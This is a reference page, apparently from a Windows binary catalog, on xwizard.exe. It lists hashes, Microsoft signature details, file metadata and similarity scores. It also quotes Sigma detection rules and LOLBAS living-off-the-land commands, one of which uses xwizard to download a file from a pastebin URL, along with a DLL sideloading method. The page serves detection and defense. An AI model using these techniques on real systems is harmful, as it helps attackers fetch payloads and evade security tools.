xwizard.exe

  • File Path: C:\WINDOWS\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

  • MD5: 30D89280E86DFB29C2F232194642125E
  • SHA1: 1E437EB24F067A666ED911F40AB459943728752C
  • SHA256: E3AB3499ADD8BE055DF9741DA2DC5E21C6B00F9A8344999808FDDF48025DF031
  • SHA384: 3C4AAD4D57720840FE01BE440538B988772137CB20CEAD4B9B1B9171F1B26CDC215E0096EA5488631E7F20AE68DD3B5D
  • SHA512: EE64AFF2EEF4B42FF1D8BD49E820D38265BCAACF400DABCF3C9E4682FBF7E2E0861616EB10A1DA8EBE637C0C8A4E335593201DCD84B5BF747EC90CF3709CDA6F
  • SSDEEP: 1536:aQqwlcECPKwnjoF3bVnLVn3g3iBzndURDoq4OZZZLlCIib:aQqrHP9jib3TBznSRD68wb

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 50
C:\WINDOWS\system32\ComputerDefaults.exe 50
C:\WINDOWS\system32\ComputerDefaults.exe 47
C:\Windows\system32\ComputerDefaults.exe 47
C:\windows\system32\ComputerDefaults.exe 52
C:\Windows\system32\ComputerDefaults.exe 43
C:\Windows\system32\xwizard.exe 55
C:\windows\system32\xwizard.exe 49
C:\Windows\system32\xwizard.exe 41
C:\WINDOWS\system32\xwizard.exe 44
C:\Windows\system32\xwizard.exe 47
C:\windows\SysWOW64\ComputerDefaults.exe 50
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 44
C:\Windows\SysWOW64\ComputerDefaults.exe 54
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 40
C:\Windows\SysWOW64\ComputerDefaults.exe 52
C:\Windows\SysWOW64\ComputerDefaults.exe 46
C:\WINDOWS\SysWOW64\xwizard.exe 46
C:\Windows\SysWOW64\xwizard.exe 50
C:\Windows\SysWOW64\xwizard.exe 49
C:\windows\SysWOW64\xwizard.exe 52
C:\Windows\SysWOW64\xwizard.exe 47
C:\WINDOWS\SysWOW64\xwizard.exe 55

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source | Source File | Example | License
sigma | proc_creation_win_class_exec_xwizard.yml | title: Custom Class Execution via Xwizard | DRL 1.0
sigma | proc_creation_win_class_exec_xwizard.yml | description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. | DRL 1.0
sigma | proc_creation_win_class_exec_xwizard.yml | - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ | DRL 1.0
sigma | proc_creation_win_class_exec_xwizard.yml | Image|endswith: '\xwizard.exe' | DRL 1.0
sigma | proc_creation_win_dll_sideload_xwizard.yml | title: Xwizard DLL Sideloading | DRL 1.0
sigma | proc_creation_win_dll_sideload_xwizard.yml | description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll | DRL 1.0
sigma | proc_creation_win_dll_sideload_xwizard.yml | - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ | DRL 1.0
sigma | proc_creation_win_dll_sideload_xwizard.yml | Image|endswith: '\xwizard.exe' | DRL 1.0
LOLBAS | Xwizard.yml | Name: Xwizard.exe |
LOLBAS | Xwizard.yml | - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} |
LOLBAS | Xwizard.yml | Description: Xwizard.exe running a custom class that has been added to the registry. |
LOLBAS | Xwizard.yml | - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} |
LOLBAS | Xwizard.yml | Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. |
LOLBAS | Xwizard.yml | - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM |
LOLBAS | Xwizard.yml | Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. |
LOLBAS | Xwizard.yml | - Path: C:\Windows\System32\xwizard.exe |
LOLBAS | Xwizard.yml | - Path: C:\Windows\SysWOW64\xwizard.exe |

MIT License. Copyright (c) 2020-2021 Strontic.